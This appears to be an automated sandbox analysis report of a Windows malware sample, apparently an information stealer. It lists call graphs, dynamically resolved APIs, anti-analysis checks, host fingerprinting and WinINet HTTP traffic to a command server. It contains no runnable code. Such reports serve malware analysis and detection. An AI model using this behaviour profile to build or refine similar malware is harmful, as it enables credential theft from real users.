38624->38627 38625->38624 38626->38627 38628 82a7b2 38627->38628 38629 82a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38627->38629 38630 82a7bb GetProcAddress GetProcAddress 38628->38630 38631 82a7ec 38628->38631 38629->38628 38630->38631 38632 82a825 38631->38632 38633 82a7f5 GetProcAddress GetProcAddress 38631->38633 38634 82a922 38632->38634 38635 82a832 10 API calls 38632->38635 38633->38632 38636 82a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38634->38636 38637 82a98d 38634->38637 38635->38634 38636->38637 38638 82a996 GetProcAddress 38637->38638 38639 82a9ae 38637->38639 38638->38639 38640 82a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38639->38640 38641 825ef3 38639->38641 38640->38641 38642 811590 38641->38642 38912 8116b0 38642->38912 38645 82aab0 lstrcpy 38646 8115b5 38645->38646 38647 82aab0 lstrcpy 38646->38647 38648 8115c7 38647->38648 38649 82aab0 lstrcpy 38648->38649 38650 8115d9 38649->38650 38651 82aab0 lstrcpy 38650->38651 38652 811663 38651->38652 38653 825760 38652->38653 38654 825771 38653->38654 38655 82ab30 2 API calls 38654->38655 38656 82577e 38655->38656 38657 82ab30 2 API calls 38656->38657 38658 82578b 38657->38658 38659 82ab30 2 API calls 38658->38659 38660 825798 38659->38660 38661 82aa50 lstrcpy 38660->38661 38662 8257a5 38661->38662 38663 82aa50 lstrcpy 38662->38663 38664 8257b2 38663->38664 38665 82aa50 lstrcpy 38664->38665 38666 8257bf 38665->38666 38667 82aa50 lstrcpy 38666->38667 38706 8257cc 38667->38706 38668 825510 25 API calls 38668->38706 38669 825440 20 API calls 38669->38706 38670 825893 StrCmpCA 38670->38706 38671 8258f0 StrCmpCA 38672 825a2c 38671->38672 38671->38706 38673 82abb0 lstrcpy 38672->38673 38674 825a38 38673->38674 38676 82ab30 2 API calls 38674->38676 38675 82ab30 lstrlen lstrcpy 38675->38706 38677 825a46 38676->38677 38680 82ab30 2 API calls 38677->38680 38678 825aa6 StrCmpCA 38679 825be1 38678->38679 38678->38706 38681 82abb0 lstrcpy 
38679->38681 38682 825a55 38680->38682 38683 825bed 38681->38683 38684 8116b0 lstrcpy 38682->38684 38685 82ab30 2 API calls 38683->38685 38703 825a61 38684->38703 38687 825bfb 38685->38687 38686 825c5b StrCmpCA 38688 825c66 Sleep 38686->38688 38689 825c78 38686->38689 38691 82ab30 2 API calls 38687->38691 38688->38706 38692 82abb0 lstrcpy 38689->38692 38690 82aa50 lstrcpy 38690->38706 38693 825c0a 38691->38693 38695 825c84 38692->38695 38694 8116b0 lstrcpy 38693->38694 38694->38703 38696 82ab30 2 API calls 38695->38696 38697 825c93 38696->38697 38698 82ab30 2 API calls 38697->38698 38699 825ca2 38698->38699 38701 8116b0 lstrcpy 38699->38701 38700 8259da StrCmpCA 38700->38706 38701->38703 38702 811590 lstrcpy 38702->38706 38703->37760 38704 825b8f StrCmpCA 38704->38706 38705 82aab0 lstrcpy 38705->38706 38706->38668 38706->38669 38706->38670 38706->38671 38706->38675 38706->38678 38706->38686 38706->38690 38706->38700 38706->38702 38706->38704 38706->38705 38707 82abb0 lstrcpy 38706->38707 38707->38706 38709 8276e3 GetVolumeInformationA 38708->38709 38710 8276dc 38708->38710 38711 827721 38709->38711 38710->38709 38712 82778c GetProcessHeap RtlAllocateHeap 38711->38712 38713 8277b8 wsprintfA 38712->38713 38714 8277a9 38712->38714 38716 82aa50 lstrcpy 38713->38716 38715 82aa50 lstrcpy 38714->38715 38717 825ff7 38715->38717 38716->38717 38717->37781 38719 82aab0 lstrcpy 38718->38719 38720 8148e9 38719->38720 38921 814800 38720->38921 38722 8148f5 38723 82aa50 lstrcpy 38722->38723 38724 814927 38723->38724 38725 82aa50 lstrcpy 38724->38725 38726 814934 38725->38726 38727 82aa50 lstrcpy 38726->38727 38728 814941 38727->38728 38729 82aa50 lstrcpy 38728->38729 38730 81494e 38729->38730 38731 82aa50 lstrcpy 38730->38731 38732 81495b InternetOpenA StrCmpCA 38731->38732 38733 814994 38732->38733 38734 814f1b InternetCloseHandle 38733->38734 38927 828cf0 38733->38927 38736 814f38 38734->38736 38942 81a210 CryptStringToBinaryA 38736->38942 38737 8149b3 38935 82ac30 38737->38935 
38741 8149c6 38742 82abb0 lstrcpy 38741->38742 38747 8149cf 38742->38747 38743 82ab30 2 API calls 38744 814f55 38743->38744 38745 82acc0 4 API calls 38744->38745 38748 814f6b 38745->38748 38746 814f77 ctype 38750 82aab0 lstrcpy 38746->38750 38751 82acc0 4 API calls 38747->38751 38749 82abb0 lstrcpy 38748->38749 38749->38746 38763 814fa7 38750->38763 38752 8149f9 38751->38752 38753 82abb0 lstrcpy 38752->38753 38754 814a02 38753->38754 38755 82acc0 4 API calls 38754->38755 38756 814a21 38755->38756 38757 82abb0 lstrcpy 38756->38757 38758 814a2a 38757->38758 38759 82ac30 3 API calls 38758->38759 38760 814a48 38759->38760 38761 82abb0 lstrcpy 38760->38761 38762 814a51 38761->38762 38764 82acc0 4 API calls 38762->38764 38763->37784 38765 814a70 38764->38765 38766 82abb0 lstrcpy 38765->38766 38767 814a79 38766->38767 38768 82acc0 4 API calls 38767->38768 38769 814a98 38768->38769 38770 82abb0 lstrcpy 38769->38770 38771 814aa1 38770->38771 38772 82acc0 4 API calls 38771->38772 38773 814acd 38772->38773 38774 82ac30 3 API calls 38773->38774 38775 814ad4 38774->38775 38776 82abb0 lstrcpy 38775->38776 38777 814add 38776->38777 38778 814af3 InternetConnectA 38777->38778 38778->38734 38779 814b23 HttpOpenRequestA 38778->38779 38781 814b78 38779->38781 38782 814f0e InternetCloseHandle 38779->38782 38783 82acc0 4 API calls 38781->38783 38782->38734 38784 814b8c 38783->38784 38785 82abb0 lstrcpy 38784->38785 38786 814b95 38785->38786 38787 82ac30 3 API calls 38786->38787 38788 814bb3 38787->38788 38789 82abb0 lstrcpy 38788->38789 38790 814bbc 38789->38790 38791 82acc0 4 API calls 38790->38791 38792 814bdb 38791->38792 38793 82abb0 lstrcpy 38792->38793 38794 814be4 38793->38794 38795 82acc0 4 API calls 38794->38795 38796 814c05 38795->38796 38797 82abb0 lstrcpy 38796->38797 38798 814c0e 38797->38798 38799 82acc0 4 API calls 38798->38799 38800 814c2e 38799->38800 38801 82abb0 lstrcpy 38800->38801 38802 814c37 38801->38802 38803 82acc0 4 API calls 38802->38803 38804 814c56 
38803->38804 38805 82abb0 lstrcpy 38804->38805 38806 814c5f 38805->38806 38807 82ac30 3 API calls 38806->38807 38808 814c7d 38807->38808 38809 82abb0 lstrcpy 38808->38809 38810 814c86 38809->38810 38811 82acc0 4 API calls 38810->38811 38812 814ca5 38811->38812 38813 82abb0 lstrcpy 38812->38813 38814 814cae 38813->38814 38815 82acc0 4 API calls 38814->38815 38816 814ccd 38815->38816 38817 82abb0 lstrcpy 38816->38817 38818 814cd6 38817->38818 38819 82ac30 3 API calls 38818->38819 38820 814cf4 38819->38820 38821 82abb0 lstrcpy 38820->38821 38822 814cfd 38821->38822 38823 82acc0 4 API calls 38822->38823 38824 814d1c 38823->38824 38825 82abb0 lstrcpy 38824->38825 38826 814d25 38825->38826 38827 82acc0 4 API calls 38826->38827 38828 814d46 38827->38828 38829 82abb0 lstrcpy 38828->38829 38830 814d4f 38829->38830 38831 82acc0 4 API calls 38830->38831 38832 814d6f 38831->38832 38833 82abb0 lstrcpy 38832->38833 38834 814d78 38833->38834 38835 82acc0 4 API calls 38834->38835 38836 814d97 38835->38836 38837 82abb0 lstrcpy 38836->38837 38838 814da0 38837->38838 38839 82ac30 3 API calls 38838->38839 38840 814dbe 38839->38840 38841 82abb0 lstrcpy 38840->38841 38842 814dc7 38841->38842 38843 82aa50 lstrcpy 38842->38843 38844 814de2 38843->38844 38845 82ac30 3 API calls 38844->38845 38846 814e03 38845->38846 38847 82ac30 3 API calls 38846->38847 38848 814e0a 38847->38848 38849 82abb0 lstrcpy 38848->38849 38850 814e16 38849->38850 38851 814e37 lstrlen 38850->38851 38852 814e4a 38851->38852 38853 814e53 lstrlen 38852->38853 38941 82ade0 38853->38941 38855 814e63 HttpSendRequestA 38856 814e82 InternetReadFile 38855->38856 38857 814eb7 InternetCloseHandle 38856->38857 38862 814eae 38856->38862 38860 82ab10 38857->38860 38859 82acc0 4 API calls 38859->38862 38860->38782 38861 82abb0 lstrcpy 38861->38862 38862->38856 38862->38857 38862->38859 38862->38861 38948 82ade0 38863->38948 38865 821a14 StrCmpCA 38866 821a1f ExitProcess 38865->38866 38877 821a27 38865->38877 38867 821c12 
38867->37786 38868 821b82 StrCmpCA 38868->38877 38869 821b63 StrCmpCA 38869->38877 38870 821bc0 StrCmpCA 38870->38877 38871 821b41 StrCmpCA 38871->38877 38872 821ba1 StrCmpCA 38872->38877 38873 821acf StrCmpCA 38873->38877 38874 821aad StrCmpCA 38874->38877 38875 821b1f StrCmpCA 38875->38877 38876 821afd StrCmpCA 38876->38877 38877->38867 38877->38868 38877->38869 38877->38870 38877->38871 38877->38872 38877->38873 38877->38874 38877->38875 38877->38876 38878 82ab30 lstrlen lstrcpy 38877->38878 38878->38877 38879->37792 38880->37794 38881->37800 38882->37802 38883->37808 38884->37810 38885->37814 38886->37818 38887->37822 38888->37828 38889->37830 38890->37834 38891->37848 38892->37852 38893->37851 38894->37847 38895->37851 38896->37865 38897->37889 38898->37857 38899->37874 38900->37884 38901->37868 38902->37876 38903->37877 38904->37879 38905->37905 38906->37908 38907->37909 38908->37904 38909->37909 38910->37918 38913 82aab0 lstrcpy 38912->38913 38914 8116c3 38913->38914 38915 82aab0 lstrcpy 38914->38915 38916 8116d5 38915->38916 38917 82aab0 lstrcpy 38916->38917 38918 8116e7 38917->38918 38919 82aab0 lstrcpy 38918->38919 38920 8115a3 38919->38920 38920->38645 38922 814816 38921->38922 38923 814888 lstrlen 38922->38923 38947 82ade0 38923->38947 38925 814898 InternetCrackUrlA 38926 8148b7 38925->38926 38926->38722 38928 82aa50 lstrcpy 38927->38928 38929 828d04 38928->38929 38930 82aa50 lstrcpy 38929->38930 38931 828d12 GetSystemTime 38930->38931 38933 828d29 38931->38933 38932 82aab0 lstrcpy 38934 828d8c 38932->38934 38933->38932 38934->38737 38937 82ac41 38935->38937 38936 82ac98 38938 82aab0 lstrcpy 38936->38938 38937->38936 38940 82ac78 lstrcpy lstrcat 38937->38940 38939 82aca4 38938->38939 38939->38741 38940->38936 38941->38855 38943 81a249 LocalAlloc 38942->38943 38944 814f3e 38942->38944 38943->38944 38945 81a264 CryptStringToBinaryA 38943->38945 38944->38743 38944->38746 38945->38944 38946 81a289 LocalFree 38945->38946 38946->38944 38947->38925 38948->38865

Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 829bb0-829bc4 call 829aa0 663 829de3-829e42 LoadLibraryA * 5 660->663 664 829bca-829dde call 829ad0 GetProcAddress * 21 660->664 666 829e44-829e58 GetProcAddress 663->666 667 829e5d-829e64 663->667 664->663 666->667 669 829e96-829e9d 667->669 670 829e66-829e91 GetProcAddress * 2 667->670 671 829eb8-829ebf 669->671 672 829e9f-829eb3 GetProcAddress 669->672 670->669 673 829ec1-829ed4 GetProcAddress 671->673 674 829ed9-829ee0 671->674 672->671 673->674 675 829ee2-829f0c GetProcAddress * 2 674->675 676 829f11-829f12 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(75900000,015F0750), ref: 00829BF1
                              • GetProcAddress.KERNEL32(75900000,015F0570), ref: 00829C0A
                              • GetProcAddress.KERNEL32(75900000,015F07C8), ref: 00829C22
                              • GetProcAddress.KERNEL32(75900000,015F05A0), ref: 00829C3A
                              • GetProcAddress.KERNEL32(75900000,015F07F8), ref: 00829C53
                              • GetProcAddress.KERNEL32(75900000,015F8B50), ref: 00829C6B
                              • GetProcAddress.KERNEL32(75900000,015E64E0), ref: 00829C83
                              • GetProcAddress.KERNEL32(75900000,015E6300), ref: 00829C9C
                              • GetProcAddress.KERNEL32(75900000,015F05B8), ref: 00829CB4
                              • GetProcAddress.KERNEL32(75900000,015F0678), ref: 00829CCC
                              • GetProcAddress.KERNEL32(75900000,015F05E8), ref: 00829CE5
                              • GetProcAddress.KERNEL32(75900000,015F0588), ref: 00829CFD
                              • GetProcAddress.KERNEL32(75900000,015E6320), ref: 00829D15
                              • GetProcAddress.KERNEL32(75900000,015F0600), ref: 00829D2E
                              • GetProcAddress.KERNEL32(75900000,015F0618), ref: 00829D46
                              • GetProcAddress.KERNEL32(75900000,015E6340), ref: 00829D5E
                              • GetProcAddress.KERNEL32(75900000,015F0630), ref: 00829D77
                              • GetProcAddress.KERNEL32(75900000,015F08A0), ref: 00829D8F
                              • GetProcAddress.KERNEL32(75900000,015E65A0), ref: 00829DA7
                              • GetProcAddress.KERNEL32(75900000,015F0888), ref: 00829DC0
                              • GetProcAddress.KERNEL32(75900000,015E6560), ref: 00829DD8
                              • LoadLibraryA.KERNEL32(015F0918,?,00826CA0), ref: 00829DEA
                              • LoadLibraryA.KERNEL32(015F08B8,?,00826CA0), ref: 00829DFB
                              • LoadLibraryA.KERNEL32(015F08E8,?,00826CA0), ref: 00829E0D
                              • LoadLibraryA.KERNEL32(015F08D0,?,00826CA0), ref: 00829E1F
                              • LoadLibraryA.KERNEL32(015F0900,?,00826CA0), ref: 00829E30
                              • GetProcAddress.KERNEL32(75070000,015F0858), ref: 00829E52
                              • GetProcAddress.KERNEL32(75FD0000,015F0870), ref: 00829E73
                              • GetProcAddress.KERNEL32(75FD0000,015F8CE8), ref: 00829E8B
                              • GetProcAddress.KERNEL32(75A50000,015F8E38), ref: 00829EAD
                              • GetProcAddress.KERNEL32(74E50000,015E65C0), ref: 00829ECE
                              • GetProcAddress.KERNEL32(76E80000,015F89F0), ref: 00829EEF
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00829F06
                              Strings
                              • NtQueryInformationProcess, xrefs: 00829EFA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: b0cac25434d2d146c94ff8a04225fba4b5db4207b7fb92191adad4b014a39a80
                              • Instruction ID: cd8735c860c77c628bbe33e3fd36705fdecc715b5e7e216d6930a1d416db6eec
                              • Opcode Fuzzy Hash: b0cac25434d2d146c94ff8a04225fba4b5db4207b7fb92191adad4b014a39a80
                              • Instruction Fuzzy Hash: 09A10BB55082809FC385DFE8FCD899A7BA9E75D7417508A1AFA09CB270D634A943CF60

                              Control-flow Graph (rendered graph omitted)
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0081465F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 008147EC
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814617, 00814622, 0081462D, 00814638, 00814643, 00814667, 00814672, 0081467D, 00814688, 00814693, 008146A7, 008146B2, 008146BD, 008146C8, 008146D3, 008146FC, 00814707, 00814712, 0081471D, 00814728, 00814763, 0081476E, 00814779, 00814784, 0081478F, 0081479F, 008147AA, 008147B5, 008147C0, 008147CB
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this single string, $-separated and repeated once per xref listed under Strings)
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 39d644fd67591ae89d67829725b69b49f1feae9726856187e4f02bffadc4a96f
                              • Instruction ID: 9908a394dbfa472ee80f58abdd09b68643c585756f984fbbd4782f6d0286fc68
                              • Opcode Fuzzy Hash: 39d644fd67591ae89d67829725b69b49f1feae9726856187e4f02bffadc4a96f
                              • Instruction Fuzzy Hash: D841D8607C360C7EC62CB7AC885ED9DB656FF82F04F506044EBA6923C2EAB855604F95

                              Control-flow Graph (rendered graph omitted)
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00814800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                                • Part of subcall function 00814800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • InternetOpenA.WININET(00830DFF,00000001,00000000,00000000,00000000), ref: 00816331
                              • StrCmpCA.SHLWAPI(?,015FE430), ref: 00816353
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816385
                              • HttpOpenRequestA.WININET(00000000,GET,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 008163D5
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0081640F
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816421
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0081644D
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008164BD
                              • InternetCloseHandle.WININET(00000000), ref: 0081653F
                              • InternetCloseHandle.WININET(00000000), ref: 00816549
                              • InternetCloseHandle.WININET(00000000), ref: 00816553
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: a6d79d48f1e182226449632832d81bb28c3c240d4e747eb38dbe76990d2f1281
                              • Instruction ID: 5952cbb4aea49d39634185c9530af3473e1754096c3ede0ea5cfe0ba6d92fc79
                              • Opcode Fuzzy Hash: a6d79d48f1e182226449632832d81bb28c3c240d4e747eb38dbe76990d2f1281
                              • Instruction Fuzzy Hash: B8714D71A00218ABDB24DBD4DC99BEEB779FF44700F108198F50AAB190EBB56AC5CF51

                              Control-flow Graph (rendered graph omitted)
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008276D2
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0082770F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827793
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0082779A
                              • wsprintfA.USER32 ref: 008277D0
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: e0b5f9e840652e232b253d4e584c45572d6c2f23b70a5d661f16c79552bc0be3
                              • Instruction ID: 27442aedebf2bff7cdf989e242917510c9b837a1b590530d792c307cd9e9b7d9
                              • Opcode Fuzzy Hash: e0b5f9e840652e232b253d4e584c45572d6c2f23b70a5d661f16c79552bc0be3
                              • Instruction Fuzzy Hash: 234171B1D04258DBDF10DB94DC85BDEBBB8FF48704F104199F609AB280D7746A84CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827A10
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827A17
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00827A2F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 6edb9f3978f8e7072d83df4f780c4a3bcbcf404c8281aa8d73dff74c2f44395b
                              • Instruction ID: abb9f23ee2091dde0691b77883446eebf32702ae1fb4e09ee09e01bb88dd987d
                              • Opcode Fuzzy Hash: 6edb9f3978f8e7072d83df4f780c4a3bcbcf404c8281aa8d73dff74c2f44395b
                              • Instruction Fuzzy Hash: 25F04FB1D48249EBC700DFD9DD85BAEBBB8FB05721F10021AFA15E7680C77515408BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: a8b3254add5566fadf2549a000a7bd1830d886f4e2c4dc70ca653a834acaef1b
                              • Instruction ID: 8e4dc9e3b325f736e388163eac5fbc491ae7328f4955d70b2861d99b4302f26a
                              • Opcode Fuzzy Hash: a8b3254add5566fadf2549a000a7bd1830d886f4e2c4dc70ca653a834acaef1b
                              • Instruction Fuzzy Hash: 1CD05E7490430CABCB04DFE098896DDBB78FB08215F000658D90562250EA305482CB65

                              Control-flow Graph (rendered graph not preserved in this extraction)
                              APIs
                              • GetProcAddress.KERNEL32(75900000,015E6540), ref: 00829F3D
                              • GetProcAddress.KERNEL32(75900000,015E6500), ref: 00829F55
                              • GetProcAddress.KERNEL32(75900000,015F8F10), ref: 00829F6E
                              • GetProcAddress.KERNEL32(75900000,015F8F40), ref: 00829F86
                              • GetProcAddress.KERNEL32(75900000,015FC910), ref: 00829F9E
                              • GetProcAddress.KERNEL32(75900000,015FC898), ref: 00829FB7
                              • GetProcAddress.KERNEL32(75900000,015EB5E0), ref: 00829FCF
                              • GetProcAddress.KERNEL32(75900000,015FCAA8), ref: 00829FE7
                              • GetProcAddress.KERNEL32(75900000,015FC7F0), ref: 0082A000
                              • GetProcAddress.KERNEL32(75900000,015FCAC0), ref: 0082A018
                              • GetProcAddress.KERNEL32(75900000,015FC850), ref: 0082A030
                              • GetProcAddress.KERNEL32(75900000,015E6440), ref: 0082A049
                              • GetProcAddress.KERNEL32(75900000,015E6660), ref: 0082A061
                              • GetProcAddress.KERNEL32(75900000,015E6600), ref: 0082A079
                              • GetProcAddress.KERNEL32(75900000,015E63A0), ref: 0082A092
                              • GetProcAddress.KERNEL32(75900000,015FC928), ref: 0082A0AA
                              • GetProcAddress.KERNEL32(75900000,015FC8C8), ref: 0082A0C2
                              • GetProcAddress.KERNEL32(75900000,015EB5B8), ref: 0082A0DB
                              • GetProcAddress.KERNEL32(75900000,015E6280), ref: 0082A0F3
                              • GetProcAddress.KERNEL32(75900000,015FCA30), ref: 0082A10B
                              • GetProcAddress.KERNEL32(75900000,015FC9A0), ref: 0082A124
                              • GetProcAddress.KERNEL32(75900000,015FC9B8), ref: 0082A13C
                              • GetProcAddress.KERNEL32(75900000,015FC940), ref: 0082A154
                              • GetProcAddress.KERNEL32(75900000,015E63C0), ref: 0082A16D
                              • GetProcAddress.KERNEL32(75900000,015FC868), ref: 0082A185
                              • GetProcAddress.KERNEL32(75900000,015FC880), ref: 0082A19D
                              • GetProcAddress.KERNEL32(75900000,015FCA18), ref: 0082A1B6
                              • GetProcAddress.KERNEL32(75900000,015FC8F8), ref: 0082A1CE
                              • GetProcAddress.KERNEL32(75900000,015FC9D0), ref: 0082A1E6
                              • GetProcAddress.KERNEL32(75900000,015FC838), ref: 0082A1FF
                              • GetProcAddress.KERNEL32(75900000,015FCA78), ref: 0082A217
                              • GetProcAddress.KERNEL32(75900000,015FC808), ref: 0082A22F
                              • GetProcAddress.KERNEL32(75900000,015FC8B0), ref: 0082A248
                              • GetProcAddress.KERNEL32(75900000,015FA038), ref: 0082A260
                              • GetProcAddress.KERNEL32(75900000,015FC8E0), ref: 0082A278
                              • GetProcAddress.KERNEL32(75900000,015FC988), ref: 0082A291
                              • GetProcAddress.KERNEL32(75900000,015E62A0), ref: 0082A2A9
                              • GetProcAddress.KERNEL32(75900000,015FC970), ref: 0082A2C1
                              • GetProcAddress.KERNEL32(75900000,015E64A0), ref: 0082A2DA
                              • GetProcAddress.KERNEL32(75900000,015FC820), ref: 0082A2F2
                              • GetProcAddress.KERNEL32(75900000,015FC958), ref: 0082A30A
                              • GetProcAddress.KERNEL32(75900000,015E62C0), ref: 0082A323
                              • GetProcAddress.KERNEL32(75900000,015E6400), ref: 0082A33B
                              • LoadLibraryA.KERNEL32(015FCAD8,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A34D
                              • LoadLibraryA.KERNEL32(015FCA60,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A35E
                              • LoadLibraryA.KERNEL32(015FC9E8,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A370
                              • LoadLibraryA.KERNEL32(015FCA00,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A382
                              • LoadLibraryA.KERNEL32(015FCA48,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A393
                              • LoadLibraryA.KERNEL32(015FCA90,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A3A5
                              • LoadLibraryA.KERNEL32(015FCCD0,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A3B7
                              • LoadLibraryA.KERNEL32(015FCB50,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A3C8
                              • GetProcAddress.KERNEL32(75FD0000,015E6980), ref: 0082A3EA
                              • GetProcAddress.KERNEL32(75FD0000,015FCC10), ref: 0082A402
                              • GetProcAddress.KERNEL32(75FD0000,015F8AD0), ref: 0082A41A
                              • GetProcAddress.KERNEL32(75FD0000,015FCCE8), ref: 0082A433
                              • GetProcAddress.KERNEL32(75FD0000,015E6720), ref: 0082A44B
                              • GetProcAddress.KERNEL32(734B0000,015EB090), ref: 0082A470
                              • GetProcAddress.KERNEL32(734B0000,015E6900), ref: 0082A489
                              • GetProcAddress.KERNEL32(734B0000,015EB018), ref: 0082A4A1
                              • GetProcAddress.KERNEL32(734B0000,015FCD48), ref: 0082A4B9
                              • GetProcAddress.KERNEL32(734B0000,015FCC88), ref: 0082A4D2
                              • GetProcAddress.KERNEL32(734B0000,015E67E0), ref: 0082A4EA
                              • GetProcAddress.KERNEL32(734B0000,015E69C0), ref: 0082A502
                              • GetProcAddress.KERNEL32(734B0000,015FCC58), ref: 0082A51B
                              • GetProcAddress.KERNEL32(763B0000,015E6840), ref: 0082A53C
                              • GetProcAddress.KERNEL32(763B0000,015E6940), ref: 0082A554
                              • GetProcAddress.KERNEL32(763B0000,015FCD00), ref: 0082A56D
                              • GetProcAddress.KERNEL32(763B0000,015FCDC0), ref: 0082A585
                              • GetProcAddress.KERNEL32(763B0000,015E6960), ref: 0082A59D
                              • GetProcAddress.KERNEL32(750F0000,015EAED8), ref: 0082A5C3
                              • GetProcAddress.KERNEL32(750F0000,015EB068), ref: 0082A5DB
                              • GetProcAddress.KERNEL32(750F0000,015FCCB8), ref: 0082A5F3
                              • GetProcAddress.KERNEL32(750F0000,015E69A0), ref: 0082A60C
                              • GetProcAddress.KERNEL32(750F0000,015E68C0), ref: 0082A624
                              • GetProcAddress.KERNEL32(750F0000,015EAF28), ref: 0082A63C
                              • GetProcAddress.KERNEL32(75A50000,015FCB68), ref: 0082A662
                              • GetProcAddress.KERNEL32(75A50000,015E6800), ref: 0082A67A
                              • GetProcAddress.KERNEL32(75A50000,015F8A30), ref: 0082A692
                              • GetProcAddress.KERNEL32(75A50000,015FCD60), ref: 0082A6AB
                              • GetProcAddress.KERNEL32(75A50000,015FCB80), ref: 0082A6C3
                              • GetProcAddress.KERNEL32(75A50000,015E6860), ref: 0082A6DB
